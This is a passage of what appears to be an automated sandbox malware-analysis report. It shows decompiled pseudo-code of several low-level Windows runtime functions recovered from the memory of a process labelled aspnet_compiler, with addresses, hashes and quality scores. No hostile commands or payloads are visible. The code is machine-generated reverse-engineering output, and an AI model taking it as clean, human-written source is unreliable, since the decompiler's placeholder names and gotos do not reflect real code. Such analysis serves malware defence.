                          						_t101 = _t36;
                          						if(_t36 != 0) {
                          							L16:
                          							if(_t36 == 0xffffffff) {
                          								goto L19;
                          							}
                          							_t62 =  *((intOrPtr*)(_t36 + 2));
                          							if((_t62 & 0x0000000f) == 0) {
                          								goto L19;
                          							}
                          							_t62 = _t62 & 0xf;
                          							if(E0149CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                          								L34:
                          								return _t88;
                          							}
                          							goto L19;
                          						}
                          						_t62 = _t85;
                          						_t36 = E014BACFD(_t62, _t73, _t101, _t57, _t62);
                          						if(_t36 == 0) {
                          							goto L19;
                          						}
                          						goto L16;
                          					}
                          				}
                          			}



















                          0x014bae44
                          0x014bae4c
                          0x014bae53
                          0x014bae55
                          0x014bae5c
                          0x014bae64
                          0x014bae68
                          0x014bae75
                          0x014bae75
                          0x014bae78
                          0x014bae7a
                          0x014bae7c
                          0x014bae7f
                          0x014baea8
                          0x014baeab
                          0x014baead
                          0x00000000
                          0x00000000
                          0x014baeb3
                          0x014baeb8
                          0x014baebb
                          0x014baebd
                          0x00000000
                          0x014bae81
                          0x014bae88
                          0x014bae8f
                          0x014bae9b
                          0x014bae96
                          0x014bae96
                          0x014bae96
                          0x014baea0
                          0x014baea3
                          0x014baebf
                          0x014baebf
                          0x014baec3
                          0x014baec9
                          0x014baf0d
                          0x014baf14
                          0x014baf3d
                          0x014baf3d
                          0x014baf41
                          0x014baf44
                          0x014baf67
                          0x014baf67
                          0x014baf6a
                          0x014bafca
                          0x014bafd1
                          0x00000000
                          0x014bafd1
                          0x014baf6c
                          0x014baf6d
                          0x014baf75
                          0x014baf7c
                          0x014baf7e
                          0x014baf80
                          0x014baf85
                          0x014baf87
                          0x014baf99
                          0x014baf89
                          0x014baf92
                          0x014baf92
                          0x014baf9e
                          0x014bafa1
                          0x014bafa3
                          0x014bafa9
                          0x014bafb0
                          0x014bafb2
                          0x014bafb4
                          0x014bafbc
                          0x014bafbc
                          0x014bafb4
                          0x014bafb0
                          0x00000000
                          0x014bafa1
                          0x014baf4f
                          0x014baf57
                          0x014baf5c
                          0x014baf5e
                          0x00000000
                          0x00000000
                          0x014baf60
                          0x014baf64
                          0x014baf64
                          0x00000000
                          0x014baf64
                          0x014baf1a
                          0x014baf25
                          0x00000000
                          0x00000000
                          0x014baf27
                          0x014baf28
                          0x014baf33
                          0x00000000
                          0x014baed0
                          0x014baed0
                          0x014baed2
                          0x014baee1
                          0x014baee4
                          0x00000000
                          0x00000000
                          0x014baee6
                          0x014baeec
                          0x00000000
                          0x00000000
                          0x014baefb
                          0x014baf07
                          0x014bafd3
                          0x014bafdb
                          0x014bafdb
                          0x00000000
                          0x014baf07
                          0x014baed6
                          0x014baed8
                          0x014baedf
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014baedf
                          0x014baec9

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5dbb7e4778ffba9f2502298a8ab191e6a05a0ce65b0d06270b1dbff00ecd4db1
                          • Instruction ID: a548004b16901d7d177643a9d00c99b345937ed5957683e667cc4d2d2308c21f
                          • Opcode Fuzzy Hash: 5dbb7e4778ffba9f2502298a8ab191e6a05a0ce65b0d06270b1dbff00ecd4db1
                          • Instruction Fuzzy Hash: 3341C2717002119BDB26CA2AC8E4BFBB799ABA4620F24421BF956873F0D734D801C6B0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E0141DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				char _v5;
                          				signed int _v12;
                          				signed int* _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				void* __ebx;
                          				void* __edi;
                          				signed int _t54;
                          				char* _t58;
                          				signed int _t66;
                          				intOrPtr _t67;
                          				intOrPtr _t68;
                          				intOrPtr _t72;
                          				intOrPtr _t73;
                          				signed int* _t75;
                          				intOrPtr _t79;
                          				intOrPtr _t80;
                          				char _t82;
                          				signed int _t83;
                          				signed int _t84;
                          				signed int _t88;
                          				signed int _t89;
                          				intOrPtr _t90;
                          				intOrPtr _t92;
                          				signed int _t97;
                          				intOrPtr _t98;
                          				intOrPtr* _t99;
                          				signed int* _t101;
                          				signed int* _t102;
                          				intOrPtr* _t103;
                          				intOrPtr _t105;
                          				signed int _t106;
                          				void* _t118;
                          
                          				_t92 = __edx;
                          				_t75 = _a4;
                          				_t98 = __ecx;
                          				_v44 = __edx;
                          				_t106 = _t75[1];
                          				_v40 = __ecx;
                          				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                          					_t82 = 0;
                          				} else {
                          					_t82 = 1;
                          				}
                          				_v5 = _t82;
                          				_t6 = _t98 + 0xc8; // 0xc9
                          				_t101 = _t6;
                          				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                          				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                          				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                          				if(_t82 != 0) {
                          					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                          					_t83 =  *_t75;
                          					_t54 = _t75[1];
                          					 *_t101 = _t83;
                          					_t84 = _t83 | _t54;
                          					_t101[1] = _t54;
                          					if(_t84 == 0) {
                          						_t101[1] = _t101[1] & _t84;
                          						 *_t101 = 1;
                          					}
                          					goto L19;
                          				} else {
                          					if(_t101 == 0) {
                          						E013FCC50(E013F4510(0xc000000d));
                          						_t88 =  *_t101;
                          						_t97 = _t101[1];
                          						L15:
                          						_v12 = _t88;
                          						_t66 = _t88 -  *_t75;
                          						_t89 = _t97;
                          						asm("sbb ecx, [ebx+0x4]");
                          						_t118 = _t89 - _t97;
                          						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                          							_t66 = _t66 | 0xffffffff;
                          							_t89 = 0x7fffffff;
                          						}
                          						 *_t101 = _t66;
                          						_t101[1] = _t89;
                          						L19:
                          						if(E01417D50() != 0) {
                          							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          						} else {
                          							_t58 = 0x7ffe0386;
                          						}
                          						_t102 = _v16;
                          						if( *_t58 != 0) {
                          							_t58 = E014C8ED6(_t102, _t98);
                          						}
                          						_t76 = _v44;
                          						E01412280(_t58, _v44);
                          						E0141DD82(_v44, _t102, _t98);
                          						E0141B944(_t102, _v5);
                          						return E0140FFB0(_t76, _t98, _t76);
                          					}
                          					_t99 = 0x7ffe03b0;
                          					do {
                          						_t103 = 0x7ffe0010;
                          						do {
                          							_t67 =  *0x14e8628; // 0x0
                          							_v28 = _t67;
                          							_t68 =  *0x14e862c; // 0x0
                          							_v32 = _t68;
                          							_v24 =  *((intOrPtr*)(_t99 + 4));
                          							_v20 =  *_t99;
                          							while(1) {
                          								_t97 =  *0x7ffe000c;
                          								_t90 =  *0x7FFE0008;
                          								if(_t97 ==  *_t103) {
                          									goto L10;
                          								}
                          								asm("pause");
                          							}
                          							L10:
                          							_t79 = _v24;
                          							_t99 = 0x7ffe03b0;
                          							_v12 =  *0x7ffe03b0;
                          							_t72 =  *0x7FFE03B4;
                          							_t103 = 0x7ffe0010;
                          							_v36 = _t72;
                          						} while (_v20 != _v12 || _t79 != _t72);
                          						_t73 =  *0x14e8628; // 0x0
                          						_t105 = _v28;
                          						_t80 =  *0x14e862c; // 0x0
                          					} while (_t105 != _t73 || _v32 != _t80);
                          					_t98 = _v40;
                          					asm("sbb edx, [ebp-0x20]");
                          					_t88 = _t90 - _v12 - _t105;
                          					_t75 = _a4;
                          					asm("sbb edx, eax");
                          					_t31 = _t98 + 0xc8; // 0x14bfb53
                          					_t101 = _t31;
                          					 *_t101 = _t88;
                          					_t101[1] = _t97;
                          					goto L15;
                          				}
                          			}









































                          0x0141dbe9
                          0x0141dbf2
                          0x0141dbf7
                          0x0141dbf9
                          0x0141dbfc
                          0x0141dc00
                          0x0141dc03
                          0x0141dc14
                          0x0141dd54
                          0x0141dd54
                          0x0141dd54
                          0x0141dc18
                          0x0141dc1d
                          0x0141dc1d
                          0x0141dc32
                          0x0141dc3b
                          0x0141dc3e
                          0x0141dc46
                          0x0141dd5b
                          0x0141dd62
                          0x0141dd64
                          0x0141dd67
                          0x0141dd69
                          0x0141dd6b
                          0x0141dd6e
                          0x0141dd70
                          0x0141dd73
                          0x0141dd73
                          0x00000000
                          0x0141dc4c
                          0x0141dc4e
                          0x01463ae3
                          0x01463ae8
                          0x01463aea
                          0x0141dce7
                          0x0141dce9
                          0x0141dcec
                          0x0141dcee
                          0x0141dcf0
                          0x0141dcf3
                          0x0141dcf5
                          0x01463af2
                          0x01463af5
                          0x01463af5
                          0x0141dd06
                          0x0141dd08
                          0x0141dd0b
                          0x0141dd12
                          0x01463b08
                          0x0141dd18
                          0x0141dd18
                          0x0141dd18
                          0x0141dd20
                          0x0141dd23
                          0x01463b16
                          0x01463b16
                          0x0141dd29
                          0x0141dd2d
                          0x0141dd36
                          0x0141dd40
                          0x0141dd51
                          0x0141dd51
                          0x0141dc54
                          0x0141dc59
                          0x0141dc59
                          0x0141dc5e
                          0x0141dc5e
                          0x0141dc63
                          0x0141dc66
                          0x0141dc6b
                          0x0141dc78
                          0x0141dc7b
                          0x0141dc81
                          0x0141dc81
                          0x0141dc83
                          0x0141dc89
                          0x00000000
                          0x00000000
                          0x0141dd7b
                          0x0141dd7b
                          0x0141dc8f
                          0x0141dc8f
                          0x0141dc92
                          0x0141dc99
                          0x0141dc9f
                          0x0141dca5
                          0x0141dcaa
                          0x0141dcaa
                          0x0141dcb3
                          0x0141dcb8
                          0x0141dcbb
                          0x0141dcc1
                          0x0141dccf
                          0x0141dcd2
                          0x0141dcd5
                          0x0141dcd7
                          0x0141dcda
                          0x0141dcdc
                          0x0141dcdc
                          0x0141dce2
                          0x0141dce4
                          0x00000000
                          0x0141dce4

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba39821fc667ef5be31beaf08064fff4bb4a557488a8109bf093b549da4ad79b
                          • Instruction ID: 22eea69ff99347efe40dbedc0a1a9e160326fab167267e6bf242e2e309588f2b
                          • Opcode Fuzzy Hash: ba39821fc667ef5be31beaf08064fff4bb4a557488a8109bf093b549da4ad79b
                          • Instruction Fuzzy Hash: AE51AFB1E00206CFCB14CFA8C484AAEFBF5BB58310F24855BD559A7369EB70A945CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E0140EF40(intOrPtr __ecx) {
                          				char _v5;
                          				char _v6;
                          				char _v7;
                          				char _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr _t58;
                          				char _t59;
                          				signed char _t69;
                          				void* _t73;
                          				signed int _t74;
                          				char _t79;
                          				signed char _t81;
                          				signed int _t85;
                          				signed int _t87;
                          				intOrPtr _t90;
                          				signed char* _t91;
                          				void* _t92;
                          				signed int _t94;
                          				void* _t96;
                          
                          				_t90 = __ecx;
                          				_v16 = __ecx;
                          				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                          					_t58 =  *((intOrPtr*)(__ecx));
                          					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                          						E013F9080(_t73, __ecx, __ecx, _t92);
                          					}
                          				}
                          				_t74 = 0;
                          				_t96 =  *0x7ffe036a - 1;
                          				_v12 = 0;
                          				_v7 = 0;
                          				if(_t96 > 0) {
                          					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                          					_v12 = _t74;
                          					_v7 = _t96 != 0;
                          				}
                          				_t79 = 0;
                          				_v8 = 0;
                          				_v5 = 0;
                          				while(1) {
                          					L4:
                          					_t59 = 1;
                          					L5:
                          					while(1) {
                          						if(_t59 == 0) {
                          							L12:
                          							_t21 = _t90 + 4; // 0x775ec21e
                          							_t87 =  *_t21;
                          							_v6 = 0;
                          							if(_t79 != 0) {
                          								if((_t87 & 0x00000002) != 0) {
                          									goto L19;
                          								}
                          								if((_t87 & 0x00000001) != 0) {
                          									_v6 = 1;
                          									_t74 = _t87 ^ 0x00000003;
                          								} else {
                          									_t51 = _t87 - 2; // -2
                          									_t74 = _t51;
                          								}
                          								goto L15;
                          							} else {
                          								if((_t87 & 0x00000001) != 0) {
                          									_v6 = 1;
                          									_t74 = _t87 ^ 0x00000001;
                          								} else {
                          									_t26 = _t87 - 4; // -4
                          									_t74 = _t26;
                          									if((_t74 & 0x00000002) == 0) {
                          										_t74 = _t74 - 2;
                          									}
                          								}
                          								L15:
                          								if(_t74 == _t87) {
                          									L19:
                          									E013F2D8A(_t74, _t90, _t87, _t90);
                          									_t74 = _v12;
                          									_v8 = 1;
                          									if(_v7 != 0 && _t74 > 0x64) {
                          										_t74 = _t74 - 1;
                          										_v12 = _t74;
                          									}
                          									_t79 = _v5;
                          									goto L4;
                          								}
                          								asm("lock cmpxchg [esi], ecx");
                          								if(_t87 != _t87) {
                          									_t74 = _v12;
                          									_t59 = 0;
                          									_t79 = _v5;
                          									continue;
                          								}
                          								if(_v6 != 0) {
                          									_t74 = _v12;
                          									L25:
                          									if(_v7 != 0) {
                          										if(_t74 < 0x7d0) {
                          											if(_v8 == 0) {
                          												_t74 = _t74 + 1;
                          											}
                          										}
                          										_t38 = _t90 + 0x14; // 0x0
                          										_t39 = _t90 + 0x14; // 0x0
                          										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                          										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                          											_t85 = _t85 & 0xff000000;
                          										}
                          										 *(_t90 + 0x14) = _t85;
                          									}
                          									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                          									 *((intOrPtr*)(_t90 + 8)) = 1;
                          									return 0;
                          								}
                          								_v5 = 1;
                          								_t87 = _t74;
                          								goto L19;
                          							}
                          						}
                          						_t94 = _t74;
                          						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                          						if(_t74 == 0) {
                          							goto L12;
                          						} else {
                          							_t91 = _t90 + 4;
                          							goto L8;
                          							L9:
                          							while((_t81 & 0x00000001) != 0) {
                          								_t69 = _t81;
                          								asm("lock cmpxchg [edi], edx");
                          								if(_t69 != _t81) {
                          									_t81 = _t69;
                          									continue;
                          								}
                          								_t90 = _v16;
                          								goto L25;
                          							}
                          							asm("pause");
                          							_t94 = _t94 - 1;
                          							if(_t94 != 0) {
                          								L8:
                          								_t81 =  *_t91;
                          								goto L9;
                          							} else {
                          								_t90 = _v16;
                          								_t79 = _v5;
                          								goto L12;
                          							}
                          						}
                          					}
                          				}
                          			}




























                          0x0140ef4b
                          0x0140ef4d
                          0x0140ef57
                          0x0140f0bd
                          0x0140f0c2
                          0x0140f0d2
                          0x0140f0d2
                          0x0140f0c2
                          0x0140ef5d
                          0x0140ef5f
                          0x0140ef67
                          0x0140ef6a
                          0x0140ef6d
                          0x0140ef74
                          0x0140ef7f
                          0x0140ef82
                          0x0140ef82
                          0x0140ef86
                          0x0140ef88
                          0x0140ef8c
                          0x0140ef8f
                          0x0140ef8f
                          0x0140ef8f
                          0x00000000
                          0x0140ef91
                          0x0140ef93
                          0x0140efc4
                          0x0140efc4
                          0x0140efc4
                          0x0140efca
                          0x0140efd0
                          0x0140f0a6
                          0x00000000
                          0x00000000
                          0x0140f0af
                          0x0145bb06
                          0x0145bb0a
                          0x0140f0b5
                          0x0140f0b5
                          0x0140f0b5
                          0x0140f0b5
                          0x00000000
                          0x0140efd6
                          0x0140efd9
                          0x0140f0de
                          0x0140f0e2
                          0x0140efdf
                          0x0140efdf
                          0x0140efdf
                          0x0140efe5
                          0x0145bafc
                          0x0145bafc
                          0x0140efe5
                          0x0140efeb
                          0x0140efed
                          0x0140f00f
                          0x0140f011
                          0x0140f01a
                          0x0140f01d
                          0x0140f021
                          0x0140f028
                          0x0140f029
                          0x0140f029
                          0x0140f02c
                          0x00000000
                          0x0140f02c
                          0x0140eff3
                          0x0140eff9
                          0x0140f0ea
                          0x0140f0ed
                          0x0140f0ef
                          0x00000000
                          0x0140f0ef
                          0x0140f003
                          0x0145bb12
                          0x0140f045
                          0x0140f049
                          0x0140f051
                          0x0140f09e
                          0x0140f0a0
                          0x0140f0a0
                          0x0140f09e
                          0x0140f053
                          0x0140f064
                          0x0140f064
                          0x0140f06b
                          0x0145bb1a
                          0x0145bb1a
                          0x0140f071
                          0x0140f071
                          0x0140f07d
                          0x0140f082
                          0x0140f08f
                          0x0140f08f
                          0x0140f009
                          0x0140f00d
                          0x00000000
                          0x0140f00d
                          0x0140efd0
                          0x0140ef97
                          0x0140efa5
                          0x0140efaa
                          0x00000000
                          0x0140efac
                          0x0140efac
                          0x0140efac
                          0x00000000
                          0x0140efb2
                          0x0140f036
                          0x0140f03a
                          0x0140f040
                          0x0140f090
                          0x00000000
                          0x0140f092
                          0x0140f042
                          0x00000000
                          0x0140f042
                          0x0140efb7
                          0x0140efb9
                          0x0140efbc
                          0x0140efb0
                          0x0140efb0
                          0x00000000
                          0x0140efbe
                          0x0140efbe
                          0x0140efc1
                          0x00000000
                          0x0140efc1
                          0x0140efbc
                          0x0140efaa
                          0x0140ef91

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                          • Instruction ID: 6a89b55bc677a6f1152975dc71a8485dcdf37bc2df1aede9eb674a40ade9d157
                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                          • Instruction Fuzzy Hash: 38510470A04245EFEB22CB6EC1907AFBBB1AF05314F1881BED945633E2C375A989C741
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E014C740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                          				signed short* _v8;
                          				intOrPtr _v12;
                          				intOrPtr _t55;
                          				void* _t56;
                          				intOrPtr* _t66;
                          				intOrPtr* _t69;
                          				void* _t74;
                          				intOrPtr* _t78;
                          				intOrPtr* _t81;
                          				intOrPtr* _t82;
                          				intOrPtr _t83;
                          				signed short* _t84;
                          				intOrPtr _t85;
                          				signed int _t87;
                          				intOrPtr* _t90;
                          				intOrPtr* _t93;
                          				intOrPtr* _t94;
                          				void* _t98;
                          
                          				_t84 = __edx;
                          				_t80 = __ecx;
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t55 = __ecx;
                          				_v8 = __edx;
                          				_t87 =  *__edx & 0x0000ffff;
                          				_v12 = __ecx;
                          				_t3 = _t55 + 0x154; // 0x154
                          				_t93 = _t3;
                          				_t78 =  *_t93;
                          				_t4 = _t87 + 2; // 0x2
                          				_t56 = _t4;
                          				while(_t78 != _t93) {
                          					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                          						L4:
                          						_t78 =  *_t78;
                          						continue;
                          					} else {
                          						_t7 = _t78 + 0x18; // 0x18
                          						if(E0144D4F0(_t7, _t84[2], _t87) == _t87) {
                          							_t40 = _t78 + 0xc; // 0xc
                          							_t94 = _t40;
                          							_t90 =  *_t94;
                          							while(_t90 != _t94) {
                          								_t41 = _t90 + 8; // 0x8
                          								_t74 = E0143F380(_a4, _t41, 0x10);
                          								_t98 = _t98 + 0xc;
                          								if(_t74 != 0) {
                          									_t90 =  *_t90;
                          									continue;
                          								}
                          								goto L12;
                          							}
                          							_t82 = L01414620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                          							if(_t82 != 0) {
                          								_t46 = _t78 + 0xc; // 0xc
                          								_t69 = _t46;
                          								asm("movsd");
                          								asm("movsd");
                          								asm("movsd");
                          								asm("movsd");
                          								_t85 =  *_t69;
                          								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                          									L20:
                          									_t82 = 3;
                          									asm("int 0x29");
                          								}
                          								 *((intOrPtr*)(_t82 + 4)) = _t69;
                          								 *_t82 = _t85;
                          								 *((intOrPtr*)(_t85 + 4)) = _t82;
                          								 *_t69 = _t82;
                          								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                          								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                          								goto L11;
                          							} else {
                          								L18:
                          								_push(0xe);
                          								_pop(0);
                          							}
                          						} else {
                          							_t84 = _v8;
                          							_t9 = _t87 + 2; // 0x2
                          							_t56 = _t9;
                          							goto L4;
                          						}
                          					}
                          					L12:
                          					return 0;
                          				}
                          				_t10 = _t87 + 0x1a; // 0x1a
                          				_t78 = L01414620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                          				if(_t78 == 0) {
                          					goto L18;
                          				} else {
                          					_t12 = _t87 + 2; // 0x2
                          					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                          					_t16 = _t78 + 0x18; // 0x18
                          					E0143F3E0(_t16, _v8[2], _t87);
                          					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                          					_t19 = _t78 + 0xc; // 0xc
                          					_t66 = _t19;
                          					 *((intOrPtr*)(_t66 + 4)) = _t66;
                          					 *_t66 = _t66;
                          					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                          					_t81 = L01414620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                          					if(_t81 == 0) {
                          						goto L18;
                          					} else {
                          						_t26 = _t78 + 0xc; // 0xc
                          						_t69 = _t26;
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t85 =  *_t69;
                          						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                          							goto L20;
                          						} else {
                          							 *((intOrPtr*)(_t81 + 4)) = _t69;
                          							 *_t81 = _t85;
                          							 *((intOrPtr*)(_t85 + 4)) = _t81;
                          							 *_t69 = _t81;
                          							_t83 = _v12;
                          							 *(_t78 + 8) = 1;
                          							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                          							_t34 = _t83 + 0x154; // 0x1ba
                          							_t69 = _t34;
                          							_t85 =  *_t69;
                          							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                          								goto L20;
                          							} else {
                          								 *_t78 = _t85;
                          								 *((intOrPtr*)(_t78 + 4)) = _t69;
                          								 *((intOrPtr*)(_t85 + 4)) = _t78;
                          								 *_t69 = _t78;
                          								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                          							}
                          						}
                          						goto L11;
                          					}
                          				}
                          				goto L12;
                          			}





















                          0x014c740d
                          0x014c740d
                          0x014c7412
                          0x014c7413
                          0x014c7416
                          0x014c7418
                          0x014c741c
                          0x014c741f
                          0x014c7422
                          0x014c7422
                          0x014c7428
                          0x014c742a
                          0x014c742a
                          0x014c7451
                          0x014c7432
                          0x014c744f
                          0x014c744f
                          0x00000000
                          0x014c7434
                          0x014c7438
                          0x014c7443
                          0x014c7517
                          0x014c7517
                          0x014c751a
                          0x014c7535
                          0x014c7520
                          0x014c7527
                          0x014c752c
                          0x014c7531
                          0x014c7533
                          0x00000000
                          0x014c7533
                          0x00000000
                          0x014c7531
                          0x014c754b
                          0x014c754f
                          0x014c755c
                          0x014c755c
                          0x014c755f
                          0x014c7560
                          0x014c7561
                          0x014c7562
                          0x014c7563
                          0x014c7568
                          0x014c756a
                          0x014c756c
                          0x014c756d
                          0x014c756d
                          0x014c756f
                          0x014c7572
                          0x014c7574
                          0x014c7577
                          0x014c757c
                          0x014c757f
                          0x00000000
                          0x014c7551
                          0x014c7551
                          0x014c7551
                          0x014c7553
                          0x014c7553
                          0x014c7449
                          0x014c7449
                          0x014c744c
                          0x014c744c
                          0x00000000
                          0x014c744c
                          0x014c7443
                          0x014c750e
                          0x014c7514
                          0x014c7514
                          0x014c7455
                          0x014c7469
                          0x014c746d
                          0x00000000
                          0x014c7473
                          0x014c7473
                          0x014c7476
                          0x014c7480
                          0x014c7484
                          0x014c748e
                          0x014c7493
                          0x014c7493
                          0x014c7496
                          0x014c7499
                          0x014c74a1
                          0x014c74b1
                          0x014c74b5
                          0x00000000
                          0x014c74bb
                          0x014c74c1
                          0x014c74c1
                          0x014c74c4
                          0x014c74c5
                          0x014c74c6
                          0x014c74c7
                          0x014c74c8
                          0x014c74cd
                          0x00000000
                          0x014c74d3
                          0x014c74d3
                          0x014c74d6
                          0x014c74d8
                          0x014c74db
                          0x014c74dd
                          0x014c74e0
                          0x014c74e7
                          0x014c74ee
                          0x014c74ee
                          0x014c74f4
                          0x014c74f9
                          0x00000000
                          0x014c74fb
                          0x014c74fb
                          0x014c74fd
                          0x014c7500
                          0x014c7503
                          0x014c7505
                          0x014c7505
                          0x014c74f9
                          0x00000000
                          0x014c74cd
                          0x014c74b5
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                          • Instruction ID: c75f71e9d6673be0b6d01b65c2067f6f105e9495af351fff7b09d648671dcbd9
                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                          • Instruction Fuzzy Hash: 79517A75600646EFDB56CF18C480A96BBB5FF55705F1880BEE9089F222E371E946CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E01422990() {
                          				signed int* _t62;
                          				signed int _t64;
                          				intOrPtr _t66;
                          				signed short* _t69;
                          				intOrPtr _t76;
                          				signed short* _t79;
                          				void* _t81;
                          				signed int _t82;
                          				signed short* _t83;
                          				signed int _t87;
                          				intOrPtr _t91;
                          				void* _t98;
                          				signed int _t99;
                          				void* _t101;
                          				signed int* _t102;
                          				void* _t103;
                          				void* _t104;
                          				void* _t107;
                          
                          				_push(0x20);
                          				_push(0x14cff00);
                          				E0144D08C(_t81, _t98, _t101);
                          				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                          				_t99 = 0;
                          				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                          				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                          				if(_t82 == 0) {
                          					_t62 = 0xc0000100;
                          				} else {
                          					 *((intOrPtr*)(_t103 - 4)) = 0;
                          					_t102 = 0xc0000100;
                          					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                          					_t64 = 4;
                          					while(1) {
                          						 *(_t103 - 0x24) = _t64;
                          						if(_t64 == 0) {
                          							break;
                          						}
                          						_t87 = _t64 * 0xc;
                          						 *(_t103 - 0x2c) = _t87;
                          						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x13d1664));
                          						if(_t107 <= 0) {
                          							if(_t107 == 0) {
                          								_t79 = E0143E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x13d1668)), _t82);
                          								_t104 = _t104 + 0xc;
                          								__eflags = _t79;
                          								if(__eflags == 0) {
                          									_t102 = E014751BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x13d166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                          									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                          									break;
                          								} else {
                          									_t64 =  *(_t103 - 0x24);
                          									goto L5;
                          								}
                          								goto L13;
                          							} else {
                          								L5:
                          								_t64 = _t64 - 1;
                          								continue;
                          							}
                          						}
                          						break;
                          					}
                          					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                          					__eflags = _t102;
                          					if(_t102 < 0) {
                          						__eflags = _t102 - 0xc0000100;
                          						if(_t102 == 0xc0000100) {
                          							_t83 =  *((intOrPtr*)(_t103 + 8));
                          							__eflags = _t83;
                          							if(_t83 != 0) {
                          								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                          								__eflags =  *_t83 - _t99;
                          								if( *_t83 == _t99) {
                          									_t102 = 0xc0000100;
                          									goto L19;
                          								} else {
                          									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                          									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                          									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                          									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                          										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
